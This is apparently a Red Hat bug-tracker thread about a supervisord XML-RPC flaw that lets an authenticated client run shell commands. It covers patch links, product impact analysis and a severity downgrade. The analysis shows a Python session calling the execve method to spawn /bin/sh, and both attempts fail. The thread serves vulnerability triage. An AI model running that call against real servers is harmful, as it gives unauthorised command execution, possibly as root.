A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root. Upstream issue: https://github.com/Supervisor/supervisor/issues/964 Upstream patches: 3.3.3 https://github.com/Supervisor/supervisor/commit/058f46141e346b18dee0497ba11203cb81ecb19e 3.2.4 https://github.com/Supervisor/supervisor/commit/aac3c21893cab7361f5c35c8e20341b298f6462e 3.1.4 https://github.com/Supervisor/supervisor/commit/dbe0f55871a122eac75760aef511efc3a8830b88 3.0.1 https://github.com/Supervisor/supervisor/commit/83060f3383ebd26add094398174f1de34cf7b7f0
Created supervisor tracking bugs for this issue: Affects: epel-all [bug 1476145] Affects: fedora-all [bug 1476144]
Analysis: Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connection. ~]$ python2 Python 2.7.5 (default, Aug 2 2016, 04:20:16) [GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from xmlrpclib import ServerProxy >>> from supervisor.xmlrpc import SupervisorTransport >>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock')) >>> server.supervisor.supervisord.options.execve('/bin/sh', [], {}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__ return self.__send(self.__name, args) File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request verbose=self.__verbose File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request self.connection.request('POST', handler, request_body, self.headers) File "/usr/lib64/python2.7/httplib.py", line 1017, in request self._send_request(method, url, body, headers) File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request self.endheaders(body) File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders self._send_output(message_body) File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output self.send(msg) File "/usr/lib64/python2.7/httplib.py", line 826, in send self.connect() File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect self.sock.connect(self.socketfile) File "/usr/lib64/python2.7/socket.py", line 224, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 2] No such file or directory supervisor package is used by calamari which uses following configuration in default install ~]# vi /etc/supervisor/conf.d/calamari.conf [supervisord] loglevel=warn logfile=/var/log/calamari/supervisord.log childlogdir=/var/log/calamari [program:carbon-cache] command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start [program:cthulhu] command=/opt/calamari/venv/bin/cthulhu-manager stderr_logfile = /var/log/calamari/cthulhu_stderr.log stdout_logfile = /var/log/calamari/cthulhu_stdout.log http server is not enabled ~]# vi /etc/supervisord.conf ;[inet_http_server] ; inet (TCP) server disabled by default ;port=127.0.0.1:9001 ; (ip_address:port specifier, *:port for all iface) 1. If server is enabled is enabled (manually enabling server) INFO RPC interface 'supervisor' initialized CRIT Server 'inet_http_server' running without any HTTP authentication checking INFO supervisord started with pid 23888 TRAC XML-RPC method called: supervisor.supervisord.options.execve() 2. with unix domain socket: >>> from xmlrpclib import ServerProxy >>> from supervisor.xmlrpc import SupervisorTransport >>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock')) >>> server.supervisor.supervisord.options.execve('/bin/sh', [], {}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__ return self.__send(self.__name, args) File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request verbose=self.__verbose File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request self.connection.request('POST', handler, request_body, self.headers) File "/usr/lib64/python2.7/httplib.py", line 1017, in request self._send_request(method, url, body, headers) File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request self.endheaders(body) File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders self._send_output(message_body) File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output self.send(msg) File "/usr/lib64/python2.7/httplib.py", line 826, in send self.connect() File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect self.sock.connect(self.socketfile) File "/usr/lib64/python2.7/socket.py", line 224, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 13] Permission denied
Supervisor is used by the Nagios componet of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also the Nagios images only exposes port 8080 (httpd), not (9001) XMLRPC network port. Marking RHMAP as not affected.
Updated CVSSv3 score to reflect the fact that while several products use this component they do not expose he supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts.
This issue has been addressed in the following products: CloudForms Management Engine 5.8 Via RHSA-2017:3005 https://access.redhat.com/errata/RHSA-2017:3005